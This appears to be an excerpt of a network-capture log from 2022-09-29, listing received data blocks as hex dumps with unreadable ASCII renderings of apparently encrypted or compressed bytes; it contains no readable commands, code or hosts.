                                                                                                                                                            2022-09-29 12:45:15 UTC24789INData Raw: 1d 0f 38 ee 07 a2 1d 77 a0 64 25 f2 23 8f cc f7 ad 07 ba 51 bd ed 51 27 27 69 eb 73 80 2b 0b 9f 69 84 3e 1b 4d fc f6 22 6d 23 95 8d fc e3 96 e7 15 cc b1 b8 6c e3 87 2e 47 bc 3f 7b 9b e3 03 0b 46 e0 c1 6b d7 b6 17 77 cb 91 19 99 9b b6 e9 db e9 21 3a c9 30 27 ee de 11 96 8b 49 64 9f 82 5e be 6a 57 c2 d0 3e 3e 68 8b 51 4b 8a 50 0f 8a 55 f3 52 c0 c8 2b 47 4d 54 67 e9 72 a3 11 af d5 64 c8 cb 5e fc d1 ff df d4 2d ae 8d 06 21 18 fd cc b3 42 0a 19 35 06 62 5e 61 5a 2c 0d 34 56 83 62 d1 6f de c5 b0 12 cd 81 a5 00 ca 44 f2 3e 80 82 46 33 31 93 38 fa fd 9c 2c 56 35 8a 68 38 39 d0 96 16 19 13 3f fd 68 08 4b ea c0 bc 47 e3 d3 5d 26 5e c7 0b f4 e8 16 05 1d 1e d2 d7 b2 92 1c 82 a2 a0 55 19 63 17 f7 95 86 f8 83 42 d6 f9 13 87 ec 45 91 ba 5e 9b b9 22 f4 c8 57 e8 b7 13 6e
                                                                                                                                                            Data Ascii: 8wd%#QQ''is+i>M"m#l.G?{Fkw!:0'Id^jW>>hQKPUR+GMTgrd^-!B5b^aZ,4VboD>F318,V5h89?hKG]&^UcBE^"Wn
                                                                                                                                                            2022-09-29 12:45:15 UTC24805INData Raw: 08 a5 9b 01 da c0 0a 6b 0f 57 9a 96 06 5f 05 10 30 fb 11 51 cd a6 7a 49 5a e6 dd 30 d5 48 09 19 60 e8 c2 c5 c2 33 9c 62 21 62 6b c5 cf bd 22 a1 2e e4 30 dc bf 11 5a 76 e9 fb c0 e7 5a 8a b0 8f 3d 20 ed f2 5f d9 06 d4 70 5e 5a 34 12 7c 6b a7 1b 35 92 9c d9 8f eb 25 49 9e c0 2b 59 f4 8c 9f 1a c9 f5 8e 89 1b 19 81 8c c5 04 e6 e3 6d ab d5 22 02 0d 7f c9 15 a5 3f 1c 3c 77 20 b2 47 c8 9a 8a ba 2a 1f 63 bc 32 a7 f0 8e 0e b5 78 3b 33 ba 6e 61 a2 2d 23 fe 67 05 f8 db 92 87 3d 2c 91 b8 c1 6e 17 fb a0 79 dc 9d 27 65 74 e8 b8 60 53 e7 3f 7d 5a de 2d be f7 c9 86 55 83 d7 0c c0 c5 fe 2b fe 63 b6 a7 71 b5 a0 f3 f2 c2 e4 3c 3a 15 e1 ba 61 f6 0a b9 f8 1d ee 76 a2 0e 31 1d 2f 80 02 e3 b5 5b ed b8 ce d0 81 ae 47 39 20 7d f8 f4 d3 32 50 cd 22 89 8b b6 1e e3 a4 f2 f2 09 23 fa
                                                                                                                                                            Data Ascii: kW_0QzIZ0H`3b!bk".0ZvZ= _p^Z4|k5%I+Ym"?<w G*c2x;3na-#g=,ny'et`S?}Z-U+cq<:av1/[G9 }2P"#
                                                                                                                                                            2022-09-29 12:45:15 UTC24821INData Raw: 3d ac 66 85 ec ff a9 62 44 94 05 5a 3d 53 29 48 37 46 ff 9a af cc 51 99 81 23 d4 b5 1c b3 c0 8c 6b 71 e1 39 db 0b 6b f7 80 c6 1f 9f 76 b3 a6 bc cd 46 35 44 14 45 52 65 53 0a d7 c6 77 10 4b 23 cc 1e b4 5b 7a 13 74 04 3d 8c f8 a7 dd 62 56 9b c1 ec 72 1f 06 d6 09 78 80 a3 e7 85 12 6f db 72 7d 1a d3 0f 1e 47 8a 7d bc 33 10 4b 20 c7 c7 6a 03 02 91 6e 66 bb 65 d9 b3 56 7c 2d bd ba e2 ab 89 9c a2 6f f7 3c 5b d2 ef 8e 69 79 8f 63 cd e4 0b 80 87 5d 6e 63 43 2f b3 fe 6a 56 b8 c4 7d ad 10 ca 33 10 f9 5b 41 f0 b5 b1 9c 41 9e d3 4d e8 51 6f 9e 9b 11 39 6a 19 85 62 bc f8 fd c0 3f c5 a2 fa 15 10 f4 14 1e cb d8 17 df f4 0c 00 56 2b 81 de 2f 32 fa b2 b7 fb 8d 68 74 7c 95 3c ee b2 5a 05 80 51 f2 8a 08 9c c6 4d f6 f7 22 4a cb 5c 8b df 45 97 58 f0 e7 39 a0 78 94 2b 62 b0 2b
                                                                                                                                                            Data Ascii: =fbDZ=S)H7FQ#kq9kvF5DEReSwK#[zt=bVrxor}G}3K jnfeV|-o<[iyc]ncC/jV}3[AAMQo9jb?V+/2ht|<ZQM"J\EX9x+b+
                                                                                                                                                            2022-09-29 12:45:15 UTC24837INData Raw: e0 72 00 45 17 77 07 95 d7 c0 15 d2 46 f4 7d c7 87 08 f2 24 0c a5 7b e0 4f 93 62 9b 7b e4 cb e1 ed 77 aa 62 79 84 15 ea 2d 7d 22 b2 7e e2 b9 ab ae fc ea ae 1f 25 30 f0 22 40 52 9c 3a ec 86 c0 a3 1f b0 f6 0a 18 a7 ff d2 ff 3a 6d ef 25 b5 95 c8 bc 17 a5 87 b5 dd 8e 73 5d 96 ac c7 2c c2 7d e9 56 73 2f d6 ee ed bb 6f 17 19 ff d6 83 82 52 63 17 4a 2b bb da d8 b6 2c 71 d1 a2 b9 f5 cc 3e 72 40 97 0f 21 f8 50 dd 01 b0 90 9f f7 72 78 3b 77 71 ad 66 65 95 1c 7e f6 de 28 3e 9c 10 b1 11 64 7d 28 03 73 75 e3 39 02 c7 de 9b 36 bf 98 6a 57 ad 78 b9 a9 18 32 63 36 1b df cf bb 0c 0e 82 68 f2 4f 3b 9b df 48 87 f6 7e e3 71 ca af c8 8a c7 05 18 98 3d 52 f4 69 8c 14 8d 20 50 54 b2 40 e4 04 0b 71 21 a0 c5 97 bf 4a 32 e3 03 6c 0e 5d d1 7c fe 48 f1 ce c9 80 9f 56 cd 7a b3 1d c6
                                                                                                                                                            Data Ascii: rEwF}${Ob{wby-}"~%0"@R::m%s],}Vs/oRcJ+,q>r@!Prx;wqfe~(>d}(su96jWx2c6hO;H~q=Ri PT@q!J2l]|HVz
                                                                                                                                                            2022-09-29 12:45:15 UTC24853INData Raw: 7a e9 f2 08 80 21 6a d3 39 78 b6 0e 3d f5 ea 9f 84 94 38 b4 6a aa 3e 37 5c 33 18 24 29 34 a1 a9 8a 7e 6e 20 b8 94 d2 64 4a 4d 8f 64 2f 7f 91 1f 09 6c 6f 28 4e 7d 87 c8 04 a3 e6 ea 22 d6 0f 0c 0c dd 75 97 78 a2 7c de d9 d0 8c 14 39 4c e6 d3 c6 fa 38 f8 39 db 8c 74 f9 05 78 b4 75 d4 9e 1c 32 89 c4 47 42 8e e6 b0 db 7f cb 2b 54 be 61 a6 ff 6f 48 fa 14 cb 02 3a ce 8a 4d 1e 74 bf c1 1e f2 d4 74 4d 69 0c 01 5b fb d4 e3 81 97 c7 93 ce 63 8e 5d 20 8e 3d 00 6f 37 36 a1 f0 6c ad e2 96 fe 2b f1 15 f8 68 38 e7 33 24 2a b1 b1 c6 f6 33 26 61 46 87 9f 74 94 c6 94 ae 8b 74 a8 91 80 93 64 63 48 05 b4 82 42 8d 6a b4 19 76 a3 aa e5 94 fa 0b 93 a5 45 38 99 1b f0 68 95 40 39 b7 ac 1e 5f 58 1f fb 51 5e 0b 8f 5e 7c c6 9c 2a da 0b c5 69 71 bb 44 ca 15 e5 6f 3f 85 ea 5d b0 bc f8
                                                                                                                                                            Data Ascii: z!j9x=8j>7\3$)4~n dJMd/lo(N}"ux|9L89txu2GB+TaoH:MttMi[c] =o76l+h83$*3&aFttdcHBjvE8h@9_XQ^^|*iqDo?]
                                                                                                                                                            2022-09-29 12:45:15 UTC24869INData Raw: 84 dc 32 77 c6 16 c3 9c 41 ee df d9 94 5e e0 76 9a 22 df 71 cf 02 24 ce 29 c7 90 0b 68 8d f9 8e 80 81 2e 7d 18 6e ff 42 77 c9 55 c2 bc c9 9e 9e 5e 82 3f 31 65 b0 47 ae ed df 23 a2 e1 04 1a e7 08 bd 16 bd 12 b0 c0 04 53 c1 f2 59 9b 0a b5 50 38 79 3c 72 62 32 8b 41 8f bd c1 21 d4 5e cc e4 42 93 72 88 e4 22 db ef 2e b5 05 19 41 5b ce 44 3d 43 27 13 67 42 e9 55 fd 82 56 e6 01 84 7f c2 6c cc d2 eb dd 98 cf d5 61 c8 ed c6 40 36 f6 1c ab 63 42 5d 94 ec b5 6d 3c 37 01 3e 9a 5d 3d 71 7d e0 59 3f 4a e9 78 93 b8 1d 53 43 11 e6 40 bd cf 0b 06 77 9c 6a 1b 05 c0 73 d2 31 e0 6d 06 9e e6 f4 91 e2 61 95 4b 41 9e fb e4 27 26 47 45 54 8a 9e 21 ad 36 88 91 55 9d 31 45 22 46 2d dd c8 e7 e0 ba c8 1e 36 dc 7a 6c 94 fa 68 bb ad 57 09 d5 75 33 d8 c7 c8 a6 d7 d5 6e 43 fc d9 c7 52
                                                                                                                                                            Data Ascii: 2wA^v"q$)h.}nBwU^?1eG#SYP8y<rb2A!^Br".A[D=C'gBUVla@6cB]m<7>]=q}Y?JxSC@wjs1maKA'&GET!6U1E"F-6zlhWu3nCR
                                                                                                                                                            2022-09-29 12:45:15 UTC24885INData Raw: 8b f9 c6 ed b0 aa aa 89 78 13 0f d9 62 96 07 dc 10 83 fc 7b cd f4 3c ca 42 1f 7a 07 b9 b1 3e 44 0a ea dd 10 f3 89 b2 6a cd 38 08 2b 8f 69 3f 2a 3d 53 8c f5 e2 e1 ce 32 9a 8b a9 77 f1 52 da 3f f7 b3 ab 93 93 8c 56 01 2c 32 a3 3a 0c 43 ae 5f 6c 9a 39 4b 60 c9 70 fe 66 90 dd 2b 09 bf 89 da b6 3f 35 82 fd 44 ea 7c e7 ed 1d 58 c5 72 22 53 21 95 1f de 24 b9 9e 25 90 c1 97 ea 2f 44 68 bb 3d 0e a4 4a bf e0 aa 5f a4 e6 06 17 f4 dd ad 4e cf 19 20 73 a6 66 d1 30 87 5d ce 9d 71 41 1f 58 90 41 f6 bb 6d d4 69 ae 54 2f 15 d9 d2 6c 88 f2 35 18 e9 84 88 dc a3 ef b2 73 79 a1 3b 2d 70 41 c5 e2 6f 54 f3 62 6e 59 ee aa 62 31 41 c4 72 18 45 c2 7f b2 e1 f3 d7 ed 8c cd 77 95 82 c8 6d 9f 91 44 b4 7d 79 4d 7f 56 b8 ac da 38 be 44 78 5d 2d f0 c4 7b e3 f9 00 4c 43 92 12 f3 58 9e 0a
                                                                                                                                                            Data Ascii: xb{<Bz>Dj8+i?*=S2wR?V,2:C_l9K`pf+?5D|Xr"S!$%/Dh=J_N sf0]qAXAmiT/l5sy;-pAoTbnYb1ArEwmD}yMV8Dx]-{LCX
                                                                                                                                                            2022-09-29 12:45:15 UTC24901INData Raw: 90 82 68 66 b3 e8 ec de 2c 9e d6 fc b4 f4 ba 99 4e 05 be 75 78 8a cf e1 1d 38 ee 9b b2 f1 33 13 7f 7f f1 90 35 dd 95 1a bd b1 4a 86 1e c8 41 7c 74 f8 81 c0 45 1f 01 ff 3f 67 49 9f 15 27 c0 4a 7d 48 22 57 05 5a 22 4a b8 fe d4 45 8e fd 42 06 cc 1c 90 77 cd 99 96 a2 6c 0f 1d 7b d1 e0 89 bf 84 3d 64 0b 4d 16 bd 73 da a5 ae bc a9 be 75 0b 99 59 1f 13 d4 5a 72 c2 b9 e1 da dd 24 76 b4 10 c7 0f bd b4 5b 33 89 0d b7 b4 f9 65 72 76 9b 74 0f bd de d4 b5 ec 2a da d5 6d b9 f1 39 42 3b e0 0e e2 6e f5 83 6d 21 f8 10 29 1e 8c 41 0b 1f bc 76 05 c9 0b bc 49 12 37 e0 a0 68 af 83 b4 da 24 6d 00 28 a5 ea 9b ab f0 17 a4 a5 81 16 03 af 6c 92 aa 18 d3 89 2d 66 d5 56 ca 68 bb 17 0b f3 ab 0b 54 76 b9 17 d2 b6 f7 2d ec 13 1e fb 9b 5c 34 66 41 0d 79 9c 62 2b 35 fb fd 55 1b 5d 17 8c
                                                                                                                                                            Data Ascii: hf,Nux835JA|tE?gI'J}H"WZ"JEBwl{=dMsuYZr$v[3ervt*m9B;nm!)AvI7h$m(l-fVhTv-\4fAyb+5U]
                                                                                                                                                            2022-09-29 12:45:15 UTC24917INData Raw: 84 ea b6 bb ea 55 56 26 27 2a ea 0c f4 1b d1 4d d7 b1 26 f3 44 f6 1b 7d 50 5f 18 9e 10 96 3d 79 94 fc 8c 97 a5 63 67 b1 c1 f9 b2 6f 7a fc ad 0d ad c7 da d0 38 61 da d5 6c 4e 80 f7 8d f8 97 5c 6b 4a 1d 8c 4c a7 e1 10 5e bc d6 e5 f6 bb 78 7e 48 34 25 12 56 d5 dd d7 51 92 12 af bc 2b 97 bc c8 81 71 2a 15 63 68 d0 10 d5 5b 30 c6 1c 57 87 db de 96 eb 0e b1 91 1e 93 86 c8 1d 94 06 8f 2e 67 d6 85 f1 86 6d ff 6e 92 9f 49 d6 f2 45 d7 2e 64 4d 99 a8 d3 9a 85 b7 cd 29 00 60 8e 3c 3f e5 c2 33 17 6b 6c d5 df f8 97 75 20 9a 39 4d 10 41 df d4 0b bc 62 db dd 34 02 3d 19 16 8a 21 a1 bc ef 1d 69 68 9d b7 34 38 9f b2 b6 3b 8e 04 0d 2d 53 90 2c 34 32 81 ea 31 11 12 4b 73 23 d9 cf dc 91 a6 e9 e5 2c d2 9a 1b d7 fb d9 d9 eb 5f aa d1 c2 d9 d9 16 2e 2f 5c 06 86 80 61 2e aa 7a 33
                                                                                                                                                            Data Ascii: UV&'*M&D}P_=ycgoz8alN\kJL^x~H4%VQ+q*ch[0W.gmnIE.dM)`<?3klu 9MAb4=!ih48;-S,421Ks#,_./\a.z3
                                                                                                                                                            2022-09-29 12:45:15 UTC24933INData Raw: c2 83 e3 5d 76 06 da 56 b2 74 97 f0 ae b1 ae 6d 32 2f 43 b0 69 10 89 6a bf cf a2 42 30 db 6f 35 69 71 36 c8 f8 3b 60 90 5e 5e 28 f6 1f 85 29 88 09 3b d6 1b 6b 3b 85 2a 8d d7 9e bc 9e d2 44 3b f7 48 d7 9f fe 3d 7e 62 34 65 1b 1a ea d4 85 85 fc 33 ec 0e d9 65 06 5c 8c 4e ce 71 dc c6 f9 1e d9 92 04 0f 4c c1 92 7f e8 76 d6 97 84 8a b5 e8 cb 31 0c e5 4b 4f dc f2 d0 a0 e8 fc 7d ed c4 8e ad 0c cd 06 78 87 31 d9 06 a8 37 64 43 65 3b 38 a8 20 ba b6 22 22 17 13 29 39 41 b0 48 3b c4 ef 7e dc 32 25 6a 94 43 11 fa 73 89 b2 a5 ed d0 23 c9 44 ac d5 4b 82 98 33 76 09 36 f9 e0 7b 68 78 5f 24 b9 14 92 1e 71 85 83 2e fc 7d 47 4b f1 7f 0c d1 6a 22 4e e7 4b 8b f8 05 3a e2 25 37 34 53 0e 27 28 4c 6d 5d 10 99 61 a2 a9 2f 70 99 75 50 fd 0a 48 56 8e d9 96 f5 80 63 01 ce b5 37 06
                                                                                                                                                            Data Ascii: ]vVtm2/CijB0o5iq6;`^^();k;*D;H=~b4e3e\NqLv1KO}x17dCe;8 "")9AH;~2%jCs#DK3v6{hx_$q.}GKj"NK:%74S'(Lm]a/puPHVc7
                                                                                                                                                            2022-09-29 12:45:15 UTC24949INData Raw: 25 90 21 72 cb eb d8 be 47 a7 82 09 dd d4 8b 48 86 be a5 14 19 5b 41 7f 4c 59 67 ae b4 a5 ff 48 7d 8b 4f 44 d4 b1 54 23 83 c0 46 7b 34 f7 55 47 0e 9d c3 16 a2 da 6b c7 25 a4 d1 ec 2a f3 4a 2f 68 c7 30 ac df cc 22 e7 d7 35 d7 54 1e d1 d8 0f 4f a5 a4 27 e0 2a 8b 8a b6 78 20 b7 10 31 2b 97 8e 5b 7b 86 2d 75 27 bc 64 56 ef 1b 81 8f 1f dd 79 56 5f 1e 75 f3 99 88 93 c6 0e af 16 e1 c4 e0 70 81 6c ce 08 4b bc ac d8 be f2 ae 77 a3 b8 43 ae 56 14 23 01 30 b3 aa 06 25 9a 36 c3 8b 6d 91 30 2c 6b 90 b7 bd 7c 23 de 5c d6 b3 da f3 17 07 f5 91 4f fc 11 1b b8 52 97 54 25 e8 e9 fa 1d 4f 10 7a a6 8a 8e c7 4c 37 dc 55 57 74 51 09 b8 ba d4 78 4a e5 c0 6e f2 ed 41 fd 3e c0 ee 39 64 6a c9 c9 ce c9 79 cf 06 4a 68 cb ce 04 bb a5 84 66 a1 98 3f 51 e3 cf 22 ee 8b 5f 18 6f e9 ae 62
                                                                                                                                                            Data Ascii: %!rGH[ALYgH}ODT#F{4UGk%*J/h0"5TO'*x 1+[{-u'dVyV_uplKwCV#0%6m0,k|#\ORT%OzL7UWtQxJnA>9djyJhf?Q"_ob
                                                                                                                                                            2022-09-29 12:45:15 UTC24965INData Raw: a3 3c 8b df 54 f5 67 2b 8e b6 8f a7 f5 f4 1b 90 8c 8f 4c db dc 4c 5d eb c8 8d fd 4f ae 71 09 3a a9 60 2a fa 2c ec 20 40 95 b5 fb ab f0 55 6c a1 a3 87 dd a4 9d 9e 74 c9 d5 8b b7 57 0c 42 3f aa eb 82 9e a0 66 03 ec 4f 72 a7 f6 eb 01 1f 40 5d 0f 15 b5 17 6e 10 db a1 59 54 98 4b a4 fd 4a d2 5a b2 4c 33 2f f5 e0 ac fe ec 97 68 91 a7 4c 5e 8f c7 97 f7 f0 b0 1a 80 c2 07 34 4d ee 27 b2 c7 d0 77 35 3b 28 aa cf ed 27 27 dc 7c 05 74 d0 5f 82 a7 78 fe 5d a0 47 09 08 a4 10 32 4c dc f0 4b a8 0a 9f e4 5b 48 30 76 71 ee b3 22 ce e8 17 fa 0a 10 36 b3 b6 c8 cf 2a d4 c4 e9 c9 38 2f c0 1b 08 7c ff 52 c7 ca ac a3 e3 1b 2e 24 48 cf 8b fb a3 4a 9f c3 a0 23 1a 13 31 75 d2 d7 8d bf ae 98 e1 45 63 cb 37 f7 c9 d4 9b 98 86 56 aa 15 f8 08 34 be 71 a5 60 e9 5f 8b ee 5c 85 6c eb 60 5c
                                                                                                                                                            Data Ascii: <Tg+LL]Oq:`*, @UltWB?fOr@]nYTKJZL3/hL^4M'w5;(''|t_x]G2LK[H0vq"6*8/|R.$HJ#1uEc7V4q`_\l`\
                                                                                                                                                            2022-09-29 12:45:15 UTC24981INData Raw: a0 16 2c 33 38 a8 f9 cd d8 45 3f 3b 4d 13 2e d4 a0 c0 73 3a f6 fe 3f 38 7a 16 02 54 4d 8e 62 21 04 c8 70 aa d4 2f aa 5c fb c1 13 d2 dd 44 60 23 af 2c 38 c8 55 70 b1 a7 63 4c 6c 64 1d 24 dd 1e e2 09 26 13 84 c8 1e 07 92 f3 76 49 12 62 b1 90 ea 3c 75 9f 1e 3d 94 a1 b6 ec d4 2b 7b 75 8a eb 52 f0 27 13 f6 a8 67 57 b1 13 c7 e3 6a 85 e4 80 c2 da f6 48 e4 d8 b5 f3 0c 93 74 7a 4f 00 da 6e 2e 3f 84 7d 9b a6 61 48 cc 2e 0d 91 49 ad 4e 7b b1 4e 7d 1b 9a d9 03 50 88 43 6d 79 7e 01 63 c0 6e e5 69 e0 df aa f4 b0 5e a9 03 75 c5 cb 77 46 dc 94 a9 ee 2d e5 1d ef 49 b2 6b 30 85 1a ee b0 bc 72 3f 32 11 32 c7 7b 29 bf 63 da 86 da f7 68 41 48 75 df 3e 3f 96 a9 4e 90 4b 61 eb 72 ab b6 93 3a a8 b1 52 78 34 07 8f 5f 81 75 b5 da da 2d 93 c6 12 fb 58 fd d5 a6 0b 34 96 40 01 20 1e
                                                                                                                                                            Data Ascii: ,38E?;M.s:?8zTMb!p/\D`#,8UpcLld$&vIb<u=+{uR'gWjHtzOn.?}aH.IN{N}PCmy~cni^uwF-Ik0r?22{)chAHu>?NKar:Rx4_u-X4@
                                                                                                                                                            2022-09-29 12:45:15 UTC24997INData Raw: 09 f4 3b b5 33 7b b2 e0 59 05 3a 25 44 79 2e 3a e9 11 89 0a 5e be 2a f2 a0 21 07 21 d0 3d 86 47 a9 10 b7 10 e5 80 71 24 0b ae 30 3a f5 01 5e ba b5 45 c7 5c 26 21 e6 c9 40 8c 9e 24 99 f2 cb 94 42 28 ed c9 d0 8e 22 9f 1b 50 32 85 e4 5f ba 0d c2 8a 56 f4 b0 3b fd f7 b6 52 02 ff f9 f5 c2 3d 46 2a fd b7 15 84 79 9c c0 06 00 a2 1f 6b f5 9f df a7 0e 15 59 6c c4 97 8c 36 2f 5e 8a 2d 2c 1c f2 ca 8b bb 55 b7 3c df 1c 2a f5 e3 b3 62 8e 2f 80 01 7a 68 b2 12 ca 43 46 34 d6 59 c1 07 3f a8 bd 0c 3d de 33 1c 40 0f ef ad d3 a5 3c 00 35 17 d4 fe 0e a9 da 13 f2 cf fe 7b 5d a5 7d 26 f6 95 71 71 7a 67 2c bd 04 1c 5b 62 26 37 0d 6e e8 6b 05 18 62 89 69 2b 99 3b 82 b0 b6 73 fb 56 0a 36 1d e1 11 4f b1 1e a0 5f d8 93 68 a2 9b f4 0f 8a f6 3e fe 69 79 38 81 d5 d7 3f 62 11 b3 b2 61
                                                                                                                                                            Data Ascii: ;3{Y:%Dy.:^*!!=Gq$0:^E\&!@$B("P2_V;R=F*ykYl6/^-,U<*b/zhCF4Y?=3@<5{]}&qqzg,[b&7nkbi+;sV6O_h>iy8?ba
                                                                                                                                                            2022-09-29 12:45:15 UTC25013INData Raw: 0e ed 69 7d 35 49 5f f6 4a f7 60 db 4c 91 c0 ea b3 f0 67 24 cb 35 8b 7c 30 73 2b 0c 39 21 4e db eb 45 86 6e af e8 5c 1a 3a dc d1 0c 88 12 fd 3b ea 59 01 87 5f aa e0 98 25 49 86 98 92 c1 54 7e 77 b0 9b 34 78 91 a4 d9 e3 40 3b 97 d9 a3 ed 1f 3b 59 8d e4 94 6d 33 ab b9 9e 09 8f 79 d6 83 e5 0b 37 34 41 ad 1f 3a b5 bc 21 e3 92 77 46 70 21 dc b3 a3 4f a4 ad 38 8f c9 1b 98 fe c7 bf 79 59 40 12 91 1a 6b 34 54 0d 46 ff 16 4f af 6a 19 af bf 44 56 fe 5f 6f 64 6a 47 b4 81 71 fc cb 45 f8 c6 5f cf 24 45 75 99 24 48 7f ee 00 8d 77 05 13 e3 75 2e c0 5b 4b 67 78 cd 61 2d c1 09 9e 20 8d 64 79 c9 ac 6c 7e de 63 28 4b 47 6d 62 94 be 42 da b8 ce 6f c3 76 3e 2b 5d ae 0a aa 89 b0 15 ce 3b b8 db 26 dc 33 d5 dd ad c3 c9 ce 3f 85 7d 0f 5e 45 3a 3a ec a5 97 72 ec 01 bd 8d c9 8b f9
                                                                                                                                                            Data Ascii: i}5I_J`Lg$5|0s+9!NEn\:;Y_%IT~w4x@;;Ym3y74A:!wFp!O8yY@k4TFOjDV_odjGqE_$Eu$Hwu.[Kgxa- dyl~c(KGmbBov>+];&3?}^E::r
                                                                                                                                                            2022-09-29 12:45:15 UTC25029INData Raw: 3d f1 54 39 f4 c7 f3 4a e1 fc 36 dd bf 97 94 8a 92 39 c0 45 8c c7 df bb da ed 71 08 9c a5 a4 97 48 01 0e f9 29 78 c6 be e4 bc e8 21 2c ac a7 e3 ca 77 8a 0e b6 b3 b2 f3 4a 4b 72 55 e1 36 0c ba c1 82 89 09 d8 96 98 40 d9 d7 90 30 d5 97 c9 86 45 0e f7 99 73 da 63 73 d5 e8 9c 49 13 d2 65 f7 87 ec 3f 02 7c 68 a7 6c ce c5 54 5d 53 df 45 9b a1 a4 b9 ea c2 c6 f2 54 05 9a 79 64 b1 bf 62 92 92 b4 d8 0e 30 66 1d ca 40 e3 cb 96 36 ec 9a bd 08 ea 24 09 86 81 4e 23 bd f4 b6 be ef 53 0f e1 ca 06 8b 48 15 4d 6d 1a 8a f8 51 13 b7 d7 c5 29 a4 16 cf d5 91 55 33 26 f6 ac 5e 36 3a b1 74 a9 01 88 b5 76 44 6b 5d 97 1e f8 7e db f2 53 28 91 f2 57 cf b3 48 f0 89 03 d9 d4 7b c5 40 d2 1a 89 5f 60 85 5e d8 d8 26 ed 64 23 7a 0f f5 ef ee b9 de cc b2 ce 2f f1 dc 95 2f 6c db 13 ab 03 44
                                                                                                                                                            Data Ascii: =T9J69EqH)x!,wJKrU6@0EscsIe?|hlT]SETydb0f@6$N#SHMmQ)U3&^6:tvDk]~S(WH{@_`^&d#z//lD
                                                                                                                                                            2022-09-29 12:45:15 UTC25045INData Raw: ec a9 7e 33 9e 3e 02 43 16 40 65 83 cb 3d 19 f8 2b 25 9a 3b cf 13 d7 df 19 b0 c7 70 28 fd da b6 ab 57 5b d7 cb 98 58 96 ce 97 b5 8a 2b 49 e3 0a f5 c5 6d bd c8 81 9f 8b 72 1a fa 5a 4f 08 af be b0 24 1c 54 82 95 9d 85 c2 fb 78 72 71 21 d8 77 27 3a 24 ef e3 e4 1d da ad f8 d8 74 16 b1 a7 5c ad 15 0e f0 5b 3f 95 fe a1 d6 c3 5d 2f 59 25 94 d5 8e 54 9e b8 ec 80 9c 3b d6 a5 75 26 5a 71 4f 97 d0 6e 9d fc 47 4e 50 fa b5 f7 bd 62 c7 9e 7a 3e b7 96 1f a7 a0 ed 0d ba 5f 0a b4 47 f1 d4 44 d6 d5 7b f0 fd 3c e3 6f 6c 8a b1 ae 7f 3a ef 4a 06 25 e1 1e a8 9c 20 eb 70 dc ac 8e af a5 03 9b 6e 76 24 e1 8f 96 c8 dc 41 cd 65 8f ef be 5e 8e 0b 17 b6 bf 29 1b e6 40 d0 99 1d 8a 05 3f 9f 12 16 20 6b 02 26 62 05 94 9a 28 c1 ba 4a 62 03 77 77 7d dc 2a 4d 4f f9 37 84 6e 3a 7f 97 33 62
                                                                                                                                                            Data Ascii: ~3>C@e=+%;p(W[X+ImrZO$Txrq!w':$t\[?]/Y%T;u&ZqOnGNPbz>_GD{<ol:J% pnv$Ae^)@? k&b(Jbww}*MO7n:3b
                                                                                                                                                            2022-09-29 12:45:15 UTC25061INData Raw: 12 21 46 b1 70 94 21 be 79 46 bc f4 14 a9 aa 18 5a 7e 1d 0c cf 0b 96 26 17 5a 41 b0 00 d8 71 db 31 7a 31 08 e4 17 0e b2 d7 99 21 02 32 36 02 f8 a0 a0 04 ff c5 18 25 04 c0 d1 e4 03 b9 da 3f 13 3d d5 b3 6c 43 e6 39 40 1e d8 d6 0d c1 1e cc 66 bc 06 de 3f 1e a9 36 2c 07 b7 72 bc 79 83 b1 a6 36 92 6c 10 6f 1c 99 86 06 e9 23 1b 38 a8 96 7d 64 ce ca 4c 05 13 b3 b5 8f 43 d5 b5 af 2b 47 85 08 d4 cc aa 97 4e f5 f7 b1 31 9e dd c5 29 1e f5 97 ee 2e 10 82 6f 3b dd 4b b0 e7 6b 32 05 8e 55 a1 d2 ca cd 29 de f4 ea 43 ff a6 e5 a6 cf 10 31 88 04 7d 67 70 d5 82 c8 14 81 cb 64 b3 26 cb 97 78 4b fd 5d 06 18 c1 5c e3 57 60 7f bf d8 71 08 1b c8 5c aa d6 fe 83 6a 3c 00 da e9 5e 2b 10 6c 17 56 88 46 a1 3f 7b 41 98 5a 18 c1 b4 99 e9 8d 9d ac c9 bf 1b 0a 44 64 c1 45 e3 2d b1 a1 8b
                                                                                                                                                            Data Ascii: !Fp!yFZ~&ZAq1z1!26%?=lC9@f?6,ry6lo#8}dLC+GN1).o;Kk2U)C1}gpd&xK]\W`q\j<^+lVF?{AZDdE-
                                                                                                                                                            2022-09-29 12:45:15 UTC25077INData Raw: 0c 74 13 d9 5d 27 92 82 76 cf 96 4c d7 35 8b f2 f1 1e d8 c9 11 c4 05 0c 88 cb 89 56 0c 5c 2d c1 89 07 22 39 4e cc f1 d6 af f5 2c 56 40 6f 98 95 55 c6 a4 a4 46 67 51 05 ea 9f d2 1b 44 c5 7f e3 f5 84 63 cb fa 1b 08 16 fc a2 ee a3 0c 3e db f9 ef 5c 23 6b fb 92 7b 5a 1d c1 16 b0 0d 7e 3d 02 03 d8 08 97 e6 ed 21 02 18 4d f7 ef 32 82 c5 b7 05 04 00 06 1d d9 ae a7 5a 42 03 78 0c eb a1 99 fa 29 c6 09 dc fd c8 f5 19 da 8f 26 ff 15 2e 28 46 d9 0f 4c f2 00 14 06 14 89 e6 d8 e3 3b 80 3e 2e ee 24 a4 8c cb ed dd 6e 23 28 e2 db 92 1f b2 70 90 de 2e fe 42 da 86 71 f2 12 75 bf 88 51 92 f5 d7 fe d5 3e 9d d1 76 e2 39 a5 d5 1f 47 4b fc 08 45 6b 40 9f 6f 49 08 12 1d 65 40 ff a1 64 49 04 a0 5d 9b c2 0b bc a1 9e ba 2e 6e dd e9 3b 04 f7 c3 eb 6b dc 12 e9 7e 47 10 8a 73 31 12 67
                                                                                                                                                            Data Ascii: t]'vL5V\-"9N,V@oUFgQDc>\#k{Z~=!M2ZBx)&.(FL;>.$n#(p.BquQ>v9GKEk@oIe@dI].n;k~Gs1g
